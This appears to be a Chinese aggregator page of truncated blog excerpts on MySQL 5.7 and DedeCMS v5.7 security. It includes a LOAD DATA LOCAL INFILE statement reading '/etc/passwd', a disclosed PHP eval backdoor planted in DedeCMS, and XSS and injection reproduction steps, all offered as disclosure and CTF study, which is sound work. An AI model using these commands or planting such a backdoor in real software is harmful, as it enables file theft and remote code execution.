前言最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile '/etc/passwd' into table proc;,从而可以导致mysq
转载
2023-11-04 21:31:38
769阅读
my.cnf
[client]
port = xxx
socket = /tmp/mysql.sock
default-character-set = utf8
[mysqld]
sql_mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES //STRICT_TRANS_TA
转载
2024-07-23 16:44:14
458阅读
# MySQL 5.7漏洞修复指南
## 概述
MySQL是一种常用的关系型数据库管理系统,而MySQL 5.7是其一个主要版本。然而,MySQL 5.7也存在一些漏洞,可能会导致数据泄露、性能问题或安全漏洞。本文将指导你如何修复这些漏洞,以确保你的MySQL数据库的安全性和稳定性。
## 流程概览
以下是修复MySQL 5.7漏洞的流程概览。你可以使用以下表格来跟随每个步骤。
```m
原创
2023-09-14 10:42:14
951阅读
中间人攻击(MiTM)MiTM 攻击(Man-in-the-MiddleAttack)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。例如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。
Riddle漏洞Riddle漏洞是Oracle MySQL 5.5和5.6客户端数
转载
2023-10-20 22:05:19
37阅读
首先我们一起来了解下DedeCMS v5.7漏洞情况: 1、漏洞描述 漏洞所在版本:DedeCMS v5.7 漏洞发布时间:2013年06月07日  
源码解析MYSQL_BIN_LOG::ordered_commit,这个函数,核心步骤如下:第一步骤:flushStage#1: flushing transactions to binary log:
步骤1 :将事务的日志写入binlog文件的buffer中,函数如下:
process_flush_stage_queue(&total_bytes,&do_rotate, &am
转载
2024-08-19 19:28:52
130阅读
最近公司准备上redis高可用方案,也准备上mysql 的MGR,于是花了点时间整理了一下5.7的新特性,由于水平有限,有些地方难免有误,欢迎指正5.7 新特性一、新添加的特性 1、安全性增强: mysql.user 表禁止空值。账号升级连接https://dev.mysql.com/doc/refman/5.7/en/mysql-nutshell.html; 建议使用m
转载
2024-02-19 11:23:20
20阅读
【系统环境】系统环境:Red Hat Enterprise Linux Server release 5.4 (Tikanga) + 5.7.16 MySQL Community Server (GPL) 【漏洞信息】 漏洞信息报告,根据集团第三
转载
2023-07-09 22:32:43
29阅读
简要描述:
DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
转载
2014-03-21 14:53:00
841阅读
2评论
mysql5.7常见问题及解决方案 文章目录mysql5.7常见问题及解决方案1.常见命令1.远程主机无法访问1.1一般情况:修改host,然后问题解决1.2特殊情况:修改host仍然未解决2.忘记密码2.1windows环境2.2linux环境3.添加用户并授权附录1.mysql密码策略 1.常见命令# root密码登录
mysql -u root -p
# 指定ip地址密码登录
mysql -
转载
2024-02-04 00:25:47
95阅读
DedeCMS V5.7 漏洞复现 XSS漏洞 首先我们在首页要进行用户的注册以及登录 这里我们已经提前注册过了,登录即可 普通用户账号密码:root/passwd 管理员账号密码:admin/pikachu 然后我们点击商店 然后点击漏洞复现 接下来我们直接加入购物车并查看 然后点击下一步 配送方 ...
转载
2021-09-27 13:14:00
1894阅读
2评论
注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,
然后访问“/member/ajax_membergroup.php?action=post&member
转载
精选
2013-01-01 20:02:57
2991阅读
mysql5.7安装上后,会生成随机密码,登录时需要查看cat /var/log/mysqld.log ,里面有随机生成的密码[Note] A temporary password is generated for root@localhost: 2Hh,uKryPJ-k登录成功后,会强制要求先改密码修改密码会报错ERROR 1819 (HY000): Your password does not
原创
2016-09-23 15:20:35
880阅读
# 如何安装Mysql 5.7
## 概述
MySQL 是一款开源的关系型数据库管理系统,常用于网站开发和应用程序的后台数据存储。本文将详细介绍如何安装 Mysql 5.7 版本,并给出每个步骤的具体操作和相应的代码。
## 安装流程
下面是安装 Mysql 5.7 的步骤,可以使用表格展示:
| 步骤 | 操作 |
| ---- | ---- |
| 步骤1 | 下载 Mysql 5.7
原创
2023-09-09 14:53:53
46阅读
# 如何使用 MySQL 5.7 的 IF 语句
## 概述
在 MySQL 5.7 版本中,引入了 IF 语句来实现条件判断。IF 语句可以根据条件的真假来执行不同的操作,是 SQL 开发中非常常用的语句之一。本文将介绍如何使用 MySQL 5.7 的 IF 语句,并提供详细的步骤和示例代码供参考。
## IF 语句的使用步骤
下表展示了使用 MySQL 5.7 的 IF 语句的步骤:
|
原创
2023-09-02 07:13:47
117阅读
一、新的体系字典表整合了存储有关数据库工具信息的事件数据字典,一切的元数据都用InnoDB引擎举行存储二、宁静和用户经管三、 innodb 加强四、MySQL 8.0更好支撑文档型数据库和JSON不可见索引,入手支撑invisible index,在优化SQL的进程中能够配置索引为不可见,优化器不会哄骗不可见索引支撑降序索引,能够对索引界说 DESC,以前,索引能够被反序扫描,但影响机能,而降序索
转载
2023-10-22 20:38:32
64阅读
一. 准备工作1 删除本地centos7中的mariadb:查看系统中是否已安装 mariadb 服务:rpm -qa | grep mariadb或yum list installed | grep mariadb如果已安装则删除 mariadb及其依赖的包:yum -y remove mariadb-libs-5.5.44-2.el7.centos.x86_64关闭防火墙:firewall-c
转载
2024-01-19 19:46:37
29阅读
【MySQL 5.7】在 CentOS 7.5 安装 MySQL 5.7
原创
2019-02-24 16:00:30
185阅读
一、创建表CREATE TABLE `user` (
`uid` int(11) NOT NULL AUTO_INCREMENT,
`info` json DEFAULT NULL, #注意desc字段类型为json
PRIMARY KEY (`uid`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;在MYSQL5.7以上
转载
2023-06-19 16:02:09
224阅读
MySQL 5.5InnoDB代替MyISAM成为MySQL默认的存储引擎。多核扩展,能更充分地使用多核CPU。InnoDB的性能提升,包括支持索引的快速创建,表压缩,I/O子系统的性能提升,PURGE操作从主线程中剥离出来,Buffer Pool可拆分为多个Instances。半同步复制。引入utf8mb4字符集,可用来存储emoji表情。引入metadata locks(元数据锁)。分区表的增
转载
2023-08-15 19:41:27
167阅读
